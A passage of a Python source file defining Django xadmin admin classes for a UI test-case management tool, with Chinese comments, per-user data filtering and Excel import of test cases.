clickandback.case_counts = all_list_1[i][11] # 填写case_counts
if all_list_1[i][12] != None: #如果依赖列有内容且内容存在数据库中,则保存依赖内容
depend = all_list_1[i][12]
depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
depend_count = depend_contents.count()
if depend_count == 1:
for depend_content in depend_contents:
clickandback.depend_case_id = depend_content.id
if all_list_1[i][13] != None: # 如果编写人列有数据则填写编写人
users = User.objects.all()
for user in users:
if user.username == all_list_1[i][13]:
clickandback.write_user_id = user.id # 填写编写人
clickandback.save() # 保存到数据库
i = i+1
pass
return super(ClickAndBackXAdmin,self).post(request,*args,**kwargs) #必须调用clickandbackAdmin父类,再调用post方法,否则会报错
#一定不要忘记,否则整个ClickAndBackXAdmin保存都会出错
class NewAddAndCheckXadmin(object):
all_zi_duan = ["id", "test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case",
# "depend_new_add_and_check_case",
"depend_click_case","confirm_ele_find",
"confirm_ele_find_value",
"click_confirm_delay_time",
"is_click_cancel",
"cancel_ele_find","cancel_ele_find_value",
"is_submit_success",
"is_signel_page","page_number_xpath",
"result_table_ele_find","result_table_ele_find_value",
"table_colnum_counts",
"case_counts", "write_user",
"add_time", "update_time"]
list_display = ["test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case",
# "depend_new_add_and_check_case",
"depend_click_case", "confirm_ele_find",
"confirm_ele_find_value",
"click_confirm_delay_time",
"is_click_cancel",
"cancel_ele_find", "cancel_ele_find_value",
"is_submit_success",
"is_signel_page", "page_number_xpath",
"result_table_ele_find", "result_table_ele_find_value",
"table_colnum_counts",
"case_counts",
"go_to_with_relevance"] # 定义显示的字段
list_filter = ["test_project", "test_module", "test_page",
"test_case_title", "is_run_case",
"write_user"] # 定义筛选的字段
search_fields = ["test_project", "test_module", "test_page",
"test_case_title"] # 定义搜索字段
model_icon = "fa fa-file-text" # 定义图标显示
ordering = ["-add_time"] # 添加默认排序规则显示排序,根据添加时间倒序排序
readonly_fields = ["write_user", "add_time",
"update_time"] # 设置某些字段为只为可读 #设置了readonly_fields,再设置exclude,exclude对该字段无效,
# exclude = ['case_step'] # 设置某些字段为不显示,即隐藏 #readonly_fields和exclude设置会有冲突
# inlines = [TestCaseInline] # inlines配和TestCaseInline使用,可以直接在项目页面添加测试用例#只能做一层嵌套,不能进行两层嵌套
list_editable = all_zi_duan # 可以在列表页对字段进行编辑
refresh_times = [3, 5] # 对列表页进行定时刷新,配置了3秒和5秒,可以从中选择一个
list_per_page = 50 # 每页设置50条数据,默认每页展示100条数据
# fk_fields = ['test_project_id',] #设置显示外键字段,未生效
list_display_links = ["test_case_title", ] # 设置点击链接进入编辑页面的字段
# date_hierarchy = 'add_time' #详细时间分层筛选,未生效
show_detail_fields = ["test_project", ] # 显示数据详情
list_export = ('xls',) # 控制列表页导出数据的可选格式
show_bookmarks = True # 控制是否显示书签功能
# 设置是否加入导入插件
import_excel = True # True表示显示使用插件,False表示不显示使用插件,该import_excel变量会覆盖插件中的变量
#设置内联
class InputTapInputTextInline(object):
model = InputTapInputText
exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class InputTapInputFileInline(object):
model = InputTapInputFile
exclude = ["add_time","update_time","newaddandcheck","editandcheck",]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class InputTapInputDateTimeInline(object):
model = InputTapInputDateTime
exclude = ["add_time","update_time","newaddandcheck","editandcheck",]
extra = 1
style = 'tab' #以标签形式展示
# 设置内联
class RadioAndReelectionLabelInline(object):
model = RadioAndReelectionLabel
exclude = ["add_time", "update_time","newaddandcheck","editandcheck",]
extra = 1
style = 'tab' # 以标签形式展示
#设置内联
class SelectTapSelectOptionInline(object):
model = SelectTapSelectOption
exclude = ["add_time","update_time","newaddandcheck","editandcheck",]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class AssertTipTextInline(object):
model = AssertTipText
exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class IframeBodyInputTextInline(object):
model = IframeBodyInputText
exclude = ["add_time","update_time","newaddandcheck","editandcheck",]
extra = 1
style = 'tab' #以标签形式展示
inlines = [InputTapInputTextInline,InputTapInputFileInline,InputTapInputDateTimeInline,
RadioAndReelectionLabelInline,
SelectTapSelectOptionInline,AssertTipTextInline,
IframeBodyInputTextInline,]
#重载get_context方法,只显示本用户添加的点击场景的用例
def get_context(self):
context = super(NewAddAndCheckXadmin, self).get_context() #调用父类
if 'form' in context: #固定写法
if self.request.user.is_superuser: # 超级用户则返回所有
context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.all()
else: # 非超级用户则只返回本用户添加的点击场景的用例
context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.filter(write_user=self.request.user) #取form中的depend_click_case(与model中的字段相同),只取当前用户填写的数据
return context
def save_models(self): # 重载save_models的方法,可以在做了某个动作后,动态重新加载
obj = self.new_obj # 取得当前用例的实例
if self.request.user.is_superuser: # 超级用户则不对编写人做修改
obj.save() # 保存当前用例
else: # 非超级用户会自动保存编写人
user = User.objects.get(username=self.request.user)
obj.write_user_id = user.id # 保存当前的write_user为用户登录的user
obj.save() # 保存当前用例
def queryset(self): # 重载queryset方法,用来做到不同的admin取出的数据不同
qs = super(NewAddAndCheckXadmin, self).queryset() # 调用父类
if self.request.user.is_superuser: # 超级用户可查看所有数据
return qs
else:
qs = qs.filter(write_user=self.request.user) # 否则只显示本用户数据
return qs # 返回qs
def post(self, request, *args, **kwargs): # 重载post函数,用于判断导入的逻辑
if 'excel' in request.FILES: # 如果excel在request.FILES中
excel_file = request.FILES.get('excel', '')
import xlrd # 导入xlrd
# 常用的Excel文件有.xls和.xls两种,.xls文件读取时需要设置formatting_info = True
# data = xlrd.open_workbook(filename=None, file_contents=excel_file.read()) # xlsx文件
exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
formatting_info=True) # xls文件
from .analyzexls import Analyzexls
analyzexls = Analyzexls()
# 将获取的数据循环导入数据库中
all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
i = 0
if len(all_list_1[0]) == 20:
while i < len(all_list_1):
newaddandcheck = NewAddAndCheck() # 数据库的对象等于ClickAndBack,实例化
newaddandcheck.test_project = all_list_1[i][0] # 填写项目all_list_1[i][j]
newaddandcheck.test_module = all_list_1[i][1] # 填写模块
newaddandcheck.test_page = all_list_1[i][2] # 填写测试页
if all_list_1[i][3] == u"冒烟用例":
newaddandcheck.case_priority = "P0" # 填写用例优先级
elif all_list_1[i][3] == u"系统的重要功能用例":
newaddandcheck.case_priority = "P1" # 填写用例优先级
elif all_list_1[i][3] == u"系统的一般功能用例":
newaddandcheck.case_priority = "P2" # 填写用例优先级
elif all_list_1[i][3] == u"极低级别的用例":
newaddandcheck.case_priority = "P3" # 填写用例优先级
newaddandcheck.test_case_title = all_list_1[i][4] # 填写测试内容的名称
newaddandcheck.is_run_case =all_list_1[i][5] # 填写是否运行
if all_list_1[i][6] != None: # 如果依赖列有内容且内容存在数据库中,则保存依赖内容
depend = all_list_1[i][6]
depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
depend_count = depend_contents.count()
if depend_count == 1:
for depend_content in depend_contents:
newaddandcheck.depend_click_case_id = depend_content.id
newaddandcheck.confirm_ele_find = all_list_1[i][7] # 填写确定按钮查找风格
newaddandcheck.confirm_ele_find_value = all_list_1[i][8] # 填写确定按钮查找风格的确切值
newaddandcheck.is_click_cancel = all_list_1[i][9] # 填写是否点击取消按钮
newaddandcheck.cancel_ele_find = all_list_1[i][10] # 填写取消按钮查找风格
newaddandcheck.cancel_ele_find_value = all_list_1[i][11] # 填写取消按钮查找风格的确切值
newaddandcheck.is_submit_success = all_list_1[i][12] # 填写是否添加成功
newaddandcheck.is_signel_page = all_list_1[i][13] # 填写是否单页面
newaddandcheck.page_number_xpath = all_list_1[i][14] # 填写页数层xpath路径值
newaddandcheck.result_table_ele_find = all_list_1[i][15] # 填写结果表格查找风格
newaddandcheck.result_table_ele_find_value = all_list_1[i][16] # 填写结果表格查找风格的确切值
newaddandcheck.table_colnum_counts = all_list_1[i][17] # 填写结果表格总列数
newaddandcheck.case_counts = all_list_1[i][18] # 填写case_counts
if all_list_1[i][19] != None: # 如果编写人列有数据则填写编写人
users = User.objects.all()
for user in users:
if user.username == all_list_1[i][19]:
newaddandcheck.write_user_id = user.id # 填写编写人
newaddandcheck.save() # 保存到数据库
i = i + 1
pass
return super(NewAddAndCheckXadmin,self).post(request,*args,**kwargs) # 必须调用clickandbackAdmin父类,再调用post方法,否则会报错
# 一定不要忘记,否则整个ClickAndBackXAdmin保存都会出错
class SearchAndCheckXadmin(object):
all_zi_duan = ["id", "test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case",
"search_ele_find",
"search_ele_find_value",
"is_with_date",
"result_table_ele_find","result_table_ele_find_value",
"case_counts", "depend_click_case",
"write_user",
"add_time", "update_time"]
list_display = ["test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case",
"search_ele_find",
"search_ele_find_value",
"is_with_date",
"result_table_ele_find", "result_table_ele_find_value",
"case_counts","depend_click_case",
"go_to_with_relevance"] # 定义显示的字段
list_filter = ["test_project", "test_module", "test_page",
"test_case_title", "is_run_case",
"write_user"] # 定义筛选的字段
search_fields = ["test_project", "test_module", "test_page",
"test_case_title"] # 定义搜索字段
model_icon = "fa fa-file-text" # 定义图标显示
ordering = ["-add_time"] # 添加默认排序规则显示排序,根据添加时间倒序排序
readonly_fields = ["write_user", "add_time",
"update_time"] # 设置某些字段为只为可读 #设置了readonly_fields,再设置exclude,exclude对该字段无效,
# exclude = ['case_step'] # 设置某些字段为不显示,即隐藏 #readonly_fields和exclude设置会有冲突
# inlines = [TestCaseInline] # inlines配和TestCaseInline使用,可以直接在项目页面添加测试用例#只能做一层嵌套,不能进行两层嵌套
list_editable = all_zi_duan # 可以在列表页对字段进行编辑
refresh_times = [3, 5] # 对列表页进行定时刷新,配置了3秒和5秒,可以从中选择一个
list_per_page = 50 # 每页设置50条数据,默认每页展示100条数据
# fk_fields = ['test_project_id',] #设置显示外键字段,未生效
list_display_links = ["test_case_title", ] # 设置点击链接进入编辑页面的字段
# date_hierarchy = 'add_time' #详细时间分层筛选,未生效
show_detail_fields = ["test_project", ] # 显示数据详情
list_export = ('xls',) # 控制列表页导出数据的可选格式
show_bookmarks = True # 控制是否显示书签功能
# 设置是否加入导入插件
import_excel = True # True表示显示使用插件,False表示不显示使用插件,该import_excel变量会覆盖插件中的变量
#设置内联
class SearchInputTapInputTextInline(object):
model = SearchInputTapInputText
exclude = ["add_time","update_time"]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class SearchSelectTapSelectOptionInline(object):
model = SearchSelectTapSelectOption
exclude = ["add_time","update_time"]
extra = 1
style = 'tab' #以标签形式展示
inlines = [SearchInputTapInputTextInline,SearchSelectTapSelectOptionInline]
#重载get_context方法,只显示本用户添加的点击场景的用例
def get_context(self):
context = super(SearchAndCheckXadmin, self).get_context() #调用父类
if 'form' in context: #固定写法
if self.request.user.is_superuser: # 超级用户则返回所有
context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.all()
else: # 非超级用户则只返回本用户添加的点击场景的用例
context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.filter(write_user=self.request.user) #取form中的depend_click_case(与model中的字段相同),只取当前用户填写的数据
return context
def save_models(self): # 重载save_models的方法,可以在做了某个动作后,动态重新加载
obj = self.new_obj # 取得当前用例的实例
if self.request.user.is_superuser: # 超级用户则不对编写人做修改
obj.save() # 保存当前用例
else: # 非超级用户会自动保存编写人
user = User.objects.get(username=self.request.user)
obj.write_user_id = user.id # 保存当前的write_user为用户登录的user
obj.save() # 保存当前用例
def queryset(self): # 重载queryset方法,用来做到不同的admin取出的数据不同
qs = super(SearchAndCheckXadmin, self).queryset() # 调用父类
if self.request.user.is_superuser: # 超级用户可查看所有数据
return qs
else:
qs = qs.filter(write_user=self.request.user) # 否则只显示本用户数据
return qs # 返回qs
def post(self, request, *args, **kwargs): # 重载post函数,用于判断导入的逻辑
if 'excel' in request.FILES: # 如果excel在request.FILES中
excel_file = request.FILES.get('excel', '')
import xlrd # 导入xlrd
# 常用的Excel文件有.xls和.xls两种,.xls文件读取时需要设置formatting_info = True
# data = xlrd.open_workbook(filename=None, file_contents=excel_file.read()) # xlsx文件
exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
formatting_info=True) # xls文件
from .analyzexls import Analyzexls
analyzexls = Analyzexls()
# 将获取的数据循环导入数据库中
all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
i = 0
if len(all_list_1[0]) == 14:
while i < len(all_list_1):
searchandcheck = SearchAndCheck() # 数据库的对象等于SearchAndCheck,实例化
searchandcheck.test_project = all_list_1[i][0] # 填写项目all_list_1[i][j]
searchandcheck.test_module = all_list_1[i][1] # 填写模块
searchandcheck.test_page = all_list_1[i][2] # 填写测试页
if all_list_1[i][3] == u"冒烟用例":
searchandcheck.case_priority = "P0" # 填写用例优先级
elif all_list_1[i][3] == u"系统的重要功能用例":
searchandcheck.case_priority = "P1" # 填写用例优先级
elif all_list_1[i][3] == u"系统的一般功能用例":
searchandcheck.case_priority = "P2" # 填写用例优先级
elif all_list_1[i][3] == u"极低级别的用例":
searchandcheck.case_priority = "P3" # 填写用例优先级
searchandcheck.test_case_title = all_list_1[i][4] # 填写测试内容的名称
searchandcheck.is_run_case = all_list_1[i][5] # 填写是否运行
# if all_list_1[i][4] == "TRUE":
# searchandcheck.is_run_case = 1 # 填写是否运行
# elif all_list_1[i][4] == "FALSE":
# searchandcheck.is_run_case = 0 # 填写是否运行
searchandcheck.search_ele_find = all_list_1[i][6] # 填写查询按钮查找风格
searchandcheck.search_ele_find_value = all_list_1[i][7] # 填写查询按钮查找风格的确切值
searchandcheck.is_with_date = all_list_1[i][8] # 填写是否查询到数据
# if all_list_1[i][7] == "TRUE":
# searchandcheck.is_with_date = "1" # 填写是否查询到数据
# elif all_list_1[i][7] == "FALSE":
# searchandcheck.is_with_date = "0" # 填写是否查询到数据
searchandcheck.result_table_ele_find = all_list_1[i][9] # 填写结果表格查找风格
searchandcheck.result_table_ele_find_value = all_list_1[i][10] # 填写结果表格查找风格的确切值
searchandcheck.case_counts = all_list_1[i][11] # 填写case_counts
if all_list_1[i][12] != None: # 如果依赖列有内容且内容存在数据库中,则保存依赖内容
depend = all_list_1[i][12]
depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
depend_count = depend_contents.count()
if depend_count == 1:
for depend_content in depend_contents:
searchandcheck.depend_click_case_id = depend_content.id
if all_list_1[i][13] != None: # 如果编写人列有数据则填写编写人
users = User.objects.all()
for user in users:
if user.username == all_list_1[i][13]:
searchandcheck.write_user_id = user.id # 填写编写人
searchandcheck.save() # 保存到数据库
i = i + 1
pass
return super(SearchAndCheckXadmin, self).post(request,*args,**kwargs) # 必须调用SearchAndCheckXadmin父类,再调用post方法,否则会报错
# 一定不要忘记,否则整个ClickAndBackXAdmin保存都会出错
class DeleteAndCheckXadmin(object):
all_zi_duan = ["id", "test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case",
"depend_click_case",
"delete_ele_find","delete_ele_find_value",
"delete_button_find", "delete_button_find_value",
"confirm_ele_find",
"confirm_ele_find_value",
"click_confirm_delay_time",
"is_click_cancel",
"cancel_ele_find","cancel_ele_find_value",
"is_submit_success",
"popup_ele_find","popup_ele_find_value","popup_text",
"is_signel_page","page_number_xpath",
"result_table_ele_find","result_table_ele_find_value",
"table_colnum_counts",
"case_counts", "write_user",
"add_time", "update_time"]
list_display = ["test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case","depend_click_case",
"delete_ele_find", "delete_ele_find_value",
"delete_button_find", "delete_button_find_value",
"confirm_ele_find",
"confirm_ele_find_value",
"click_confirm_delay_time",
"is_click_cancel",
"cancel_ele_find", "cancel_ele_find_value",
"is_submit_success",
"popup_ele_find", "popup_ele_find_value", "popup_text",
"is_signel_page", "page_number_xpath",
"result_table_ele_find", "result_table_ele_find_value",
"table_colnum_counts",
"case_counts",
"go_to"] # 定义显示的字段
list_filter = ["test_project", "test_module", "test_page",
"test_case_title", "is_run_case",
"write_user"] # 定义筛选的字段
search_fields = ["test_project", "test_module", "test_page",
"test_case_title"] # 定义搜索字段
model_icon = "fa fa-file-text" # 定义图标显示
ordering = ["-add_time"] # 添加默认排序规则显示排序,根据添加时间倒序排序
readonly_fields = ["write_user", "add_time",
"update_time"] # 设置某些字段为只为可读 #设置了readonly_fields,再设置exclude,exclude对该字段无效,
# exclude = ['case_step'] # 设置某些字段为不显示,即隐藏 #readonly_fields和exclude设置会有冲突
# inlines = [TestCaseInline] # inlines配和TestCaseInline使用,可以直接在项目页面添加测试用例#只能做一层嵌套,不能进行两层嵌套
list_editable = all_zi_duan # 可以在列表页对字段进行编辑
refresh_times = [3, 5] # 对列表页进行定时刷新,配置了3秒和5秒,可以从中选择一个
list_per_page = 50 # 每页设置50条数据,默认每页展示100条数据
# fk_fields = ['test_project_id',] #设置显示外键字段,未生效
list_display_links = ["test_case_title", ] # 设置点击链接进入编辑页面的字段
# date_hierarchy = 'add_time' #详细时间分层筛选,未生效
show_detail_fields = ["test_project", ] # 显示数据详情
list_export = ('xls',) # 控制列表页导出数据的可选格式
show_bookmarks = True # 控制是否显示书签功能
# 设置是否加入导入插件
import_excel = True # True表示显示使用插件,False表示不显示使用插件,该import_excel变量会覆盖插件中的变量
#重载get_context方法,只显示本用户添加的点击场景的用例
def get_context(self):
context = super(DeleteAndCheckXadmin, self).get_context() #调用父类
if 'form' in context: #固定写法
if self.request.user.is_superuser: # 超级用户则返回所有
context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.all()
else: # 非超级用户则只返回本用户添加的点击场景的用例
context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.filter(write_user=self.request.user) #取form中的depend_click_case(与model中的字段相同),只取当前用户填写的数据
return context
def save_models(self): # 重载save_models的方法,可以在做了某个动作后,动态重新加载
obj = self.new_obj # 取得当前用例的实例
if self.request.user.is_superuser: # 超级用户则不对编写人做修改
obj.save() # 保存当前用例
else: # 非超级用户会自动保存编写人
user = User.objects.get(username=self.request.user)
obj.write_user_id = user.id # 保存当前的write_user为用户登录的user
obj.save() # 保存当前用例
def queryset(self): # 重载queryset方法,用来做到不同的admin取出的数据不同
qs = super(DeleteAndCheckXadmin, self).queryset() # 调用父类
if self.request.user.is_superuser: # 超级用户可查看所有数据
return qs
else:
qs = qs.filter(write_user=self.request.user) # 否则只显示本用户数据
return qs # 返回qs
def post(self, request, *args, **kwargs): # 重载post函数,用于判断导入的逻辑
if 'excel' in request.FILES: # 如果excel在request.FILES中
excel_file = request.FILES.get('excel', '')
import xlrd # 导入xlrd
# 常用的Excel文件有.xls和.xls两种,.xls文件读取时需要设置formatting_info = True
# data = xlrd.open_workbook(filename=None, file_contents=excel_file.read()) # xlsx文件
exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
formatting_info=True) # xls文件
from .analyzexls import Analyzexls
analyzexls = Analyzexls()
# 将获取的数据循环导入数据库中
all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
i = 0
if len(all_list_1[0]) == 28:
while i < len(all_list_1):
deleteandcheck = DeleteAndCheck() # 数据库的对象等于ClickAndBack,实例化
deleteandcheck.test_project = all_list_1[i][0] # 填写项目all_list_1[i][j]
deleteandcheck.test_module = all_list_1[i][1] # 填写模块
deleteandcheck.test_page = all_list_1[i][2] # 填写测试页
if all_list_1[i][3] == u"冒烟用例":
deleteandcheck.case_priority = "P0" # 填写用例优先级
elif all_list_1[i][3] == u"系统的重要功能用例":
deleteandcheck.case_priority = "P1" # 填写用例优先级
elif all_list_1[i][3] == u"系统的一般功能用例":
deleteandcheck.case_priority = "P2" # 填写用例优先级
elif all_list_1[i][3] == u"极低级别的用例":
deleteandcheck.case_priority = "P3" # 填写用例优先级
deleteandcheck.test_case_title = all_list_1[i][4] # 填写测试内容的名称
deleteandcheck.is_run_case =all_list_1[i][5] # 填写是否运行
if all_list_1[i][6] != None: # 如果依赖列有内容且内容存在数据库中,则保存依赖内容
depend = all_list_1[i][6]
depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
depend_count = depend_contents.count()
if depend_count == 1:
for depend_content in depend_contents:
deleteandcheck.depend_click_case_id = depend_content.id
deleteandcheck.delete_ele_find = all_list_1[i][7] # 填写被删除元素查找风格
deleteandcheck.delete_ele_find_value = all_list_1[i][8] # 填写被删除元素查找风格的确切值
deleteandcheck.delete_button_find = all_list_1[i][9] # 填写删除按钮查找风格
deleteandcheck.delete_button_find_value = all_list_1[i][10] # 填写删除按钮查找风格的确切值
deleteandcheck.confirm_ele_find = all_list_1[i][11] # 填写确定按钮查找风格
deleteandcheck.confirm_ele_find_value = all_list_1[i][12] # 填写确定按钮查找风格的确切值
deleteandcheck.click_confirm_delay_time = all_list_1[i][13] # 填写点击确定按钮后的延时时长(单位秒)
deleteandcheck.is_click_cancel = all_list_1[i][14] # 填写是否点击取消按钮
deleteandcheck.cancel_ele_find = all_list_1[i][15] # 填写取消按钮查找风格
deleteandcheck.cancel_ele_find_value = all_list_1[i][16] # 填写取消按钮查找风格的确切值
deleteandcheck.is_submit_success = all_list_1[i][17] # 填写是否添加成功
deleteandcheck.popup_ele_find = all_list_1[i][18] # 填写删除成功弹框中的某个元素查找风格
deleteandcheck.popup_ele_find_value = all_list_1[i][19] # 填写删除成功弹框中的某个元素查找风格的确切值
deleteandcheck.popup_text = all_list_1[i][20] # 填写删除成功弹框中的某个元素文本信息内容
deleteandcheck.is_signel_page = all_list_1[i][21] # 填写是否单页面
deleteandcheck.page_number_xpath = all_list_1[i][22] # 填写页数层xpath路径值
deleteandcheck.result_table_ele_find = all_list_1[i][23] # 填写结果表格查找风格
deleteandcheck.result_table_ele_find_value = all_list_1[i][24] # 填写结果表格查找风格的确切值
deleteandcheck.table_colnum_counts = all_list_1[i][25] # 填写结果表格总列数
deleteandcheck.case_counts = all_list_1[i][26] # 填写case_counts
if all_list_1[i][27] != None: # 如果编写人列有数据则填写编写人
users = User.objects.all()
for user in users:
if user.username == all_list_1[i][27]:
deleteandcheck.write_user_id = user.id # 填写编写人
deleteandcheck.save() # 保存到数据库
i = i + 1
pass
return super(DeleteAndCheckXadmin,self).post(request,*args,**kwargs) # 必须调用clickandbackAdmin父类,再调用post方法,否则会报错
# 一定不要忘记,否则整个ClickAndBackXAdmin保存都会出错
class EditAndCheckXadmin(object):
all_zi_duan = ["id", "test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case",
# "depend_new_add_and_check_case",
"depend_click_case",
"edit_ele_find","edit_ele_find_value","edit_button_find","edit_button_find_value",
"confirm_ele_find",
"confirm_ele_find_value",
"click_confirm_delay_time",
"is_click_cancel",
"cancel_ele_find","cancel_ele_find_value",
"is_submit_success",
"is_signel_page","page_number_xpath",
"result_table_ele_find","result_table_ele_find_value",
"table_colnum_counts",
"case_counts", "write_user",
"add_time", "update_time"]
list_display = ["test_project", "test_module", "test_page",
"case_priority",
"test_case_title", "is_run_case",
# "depend_new_add_and_check_case",
"depend_click_case",
"edit_ele_find", "edit_ele_find_value", "edit_button_find", "edit_button_find_value",
"confirm_ele_find",
"confirm_ele_find_value",
"click_confirm_delay_time",
"is_click_cancel",
"cancel_ele_find", "cancel_ele_find_value",
"is_submit_success",
"is_signel_page", "page_number_xpath",
"result_table_ele_find", "result_table_ele_find_value",
"table_colnum_counts",
"case_counts",
"go_to"] # 定义显示的字段
list_filter = ["test_project", "test_module", "test_page",
"test_case_title", "is_run_case",
"write_user"] # 定义筛选的字段
search_fields = ["test_project", "test_module", "test_page",
"test_case_title"] # 定义搜索字段
model_icon = "fa fa-file-text" # 定义图标显示
ordering = ["-add_time"] # 添加默认排序规则显示排序,根据添加时间倒序排序
readonly_fields = ["write_user", "add_time",
"update_time"] # 设置某些字段为只为可读 #设置了readonly_fields,再设置exclude,exclude对该字段无效,
# exclude = ['case_step'] # 设置某些字段为不显示,即隐藏 #readonly_fields和exclude设置会有冲突
# inlines = [TestCaseInline] # inlines配和TestCaseInline使用,可以直接在项目页面添加测试用例#只能做一层嵌套,不能进行两层嵌套
list_editable = all_zi_duan # 可以在列表页对字段进行编辑
refresh_times = [3, 5] # 对列表页进行定时刷新,配置了3秒和5秒,可以从中选择一个
list_per_page = 50 # 每页设置50条数据,默认每页展示100条数据
# fk_fields = ['test_project_id',] #设置显示外键字段,未生效
list_display_links = ["test_case_title", ] # 设置点击链接进入编辑页面的字段
# date_hierarchy = 'add_time' #详细时间分层筛选,未生效
show_detail_fields = ["test_project", ] # 显示数据详情
list_export = ('xls',) # 控制列表页导出数据的可选格式
show_bookmarks = True # 控制是否显示书签功能
# 设置是否加入导入插件
import_excel = True # True表示显示使用插件,False表示不显示使用插件,该import_excel变量会覆盖插件中的变量
#设置内联
class InputTapInputTextInline(object):
model = InputTapInputText
exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class InputTapInputFileInline(object):
model = InputTapInputFile
exclude = ["add_time","update_time","newaddandcheck","editandcheck"]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class InputTapInputDateTimeInline(object):
model = InputTapInputDateTime
exclude = ["add_time","update_time","newaddandcheck","editandcheck"]
extra = 1
style = 'tab' #以标签形式展示
# 设置内联
class RadioAndReelectionLabelInline(object):
model = RadioAndReelectionLabel
exclude = ["add_time", "update_time","newaddandcheck","editandcheck"]
extra = 1
style = 'tab' # 以标签形式展示
#设置内联
class SelectTapSelectOptionInline(object):
model = SelectTapSelectOption
exclude = ["add_time","update_time","newaddandcheck","editandcheck"]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class AssertTipTextInline(object):
model = AssertTipText
exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
extra = 1
style = 'tab' #以标签形式展示
#设置内联
class IframeBodyInputTextInline(object):
model = IframeBodyInputText
exclude = ["add_time","update_time","newaddandcheck","editandcheck"]
extra = 1
style = 'tab' #以标签形式展示
inlines = [InputTapInputTextInline,InputTapInputFileInline,InputTapInputDateTimeInline,
RadioAndReelectionLabelInline,
SelectTapSelectOptionInline,AssertTipTextInline,
IframeBodyInputTextInline,]
#重载get_context方法,只显示本用户添加的点击场景的用例
def get_context(self):
context = super(EditAndCheckXadmin, self).get_context() #调用父类
if 'form' in context: #固定写法
if self.request.user.is_superuser: # 超级用户则返回所有
context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.all()
else: # 非超级用户则只返回本用户添加的点击场景的用例
context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.filter(write_user=self.request.user) #取form中的depend_click_case(与model中的字段相同),只取当前用户填写的数据
return context
def save_models(self): # 重载save_models的方法,可以在做了某个动作后,动态重新加载
obj = self.new_obj # 取得当前用例的实例
if self.request.user.is_superuser: # 超级用户则不对编写人做修改
obj.save() # 保存当前用例
else: # 非超级用户会自动保存编写人
user = User.objects.get(username=self.request.user)
obj.write_user_id = user.id # 保存当前的write_user为用户登录的user
obj.save() # 保存当前用例
def queryset(self): # 重载queryset方法,用来做到不同的admin取出的数据不同
qs = super(EditAndCheckXadmin, self).queryset() # 调用父类
if self.request.user.is_superuser: # 超级用户可查看所有数据
return qs
else:
qs = qs.filter(write_user=self.request.user) # 否则只显示本用户数据
return qs # 返回qs
def post(self, request, *args, **kwargs): # 重载post函数,用于判断导入的逻辑
if 'excel' in request.FILES: # 如果excel在request.FILES中
excel_file = request.FILES.get('excel', '')
import xlrd # 导入xlrd
# 常用的Excel文件有.xls和.xls两种,.xls文件读取时需要设置formatting_info = True
# data = xlrd.open_workbook(filename=None, file_contents=excel_file.read()) # xlsx文件
exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
formatting_info=True) # xls文件
from .analyzexls import Analyzexls
analyzexls = Analyzexls()
# 将获取的数据循环导入数据库中
all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
i = 0
if len(all_list_1[0]) == 25:
while i < len(all_list_1):
editandcheck = EditAndCheck() # 数据库的对象等于EditAndCheck,实例化
editandcheck.test_project = all_list_1[i][0] # 填写项目all_list_1[i][j]
editandcheck.test_module = all_list_1[i][1] # 填写模块
editandcheck.test_page = all_list_1[i][2] # 填写测试页
if all_list_1[i][3] == u"冒烟用例":
editandcheck.case_priority = "P0" # 填写用例优先级
elif all_list_1[i][3] == u"系统的重要功能用例":
editandcheck.case_priority = "P1" # 填写用例优先级
elif all_list_1[i][3] == u"系统的一般功能用例":
editandcheck.case_priority = "P2" # 填写用例优先级
elif all_list_1[i][3] == u"极低级别的用例":
editandcheck.case_priority = "P3" # 填写用例优先级
editandcheck.test_case_title = all_list_1[i][4] # 填写测试内容的名称
editandcheck.is_run_case =all_list_1[i][5] # 填写是否运行
if all_list_1[i][6] != None: # 如果依赖列有内容且内容存在数据库中,则保存依赖内容
depend = all_list_1[i][6]
depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
depend_count = depend_contents.count()
if depend_count == 1:
for depend_content in depend_contents:
editandcheck.depend_click_case_id = depend_content.id
editandcheck.edit_ele_find = all_list_1[i][7] # 填写被修改元素查找风格
editandcheck.edit_ele_find_value = all_list_1[i][8] # 填写被修改元素查找风格的确切值
editandcheck.edit_button_find = all_list_1[i][9] # 填写修改按钮查找风格
editandcheck.edit_button_find_value = all_list_1[i][10] # 填写修改按钮查找风格的确切值
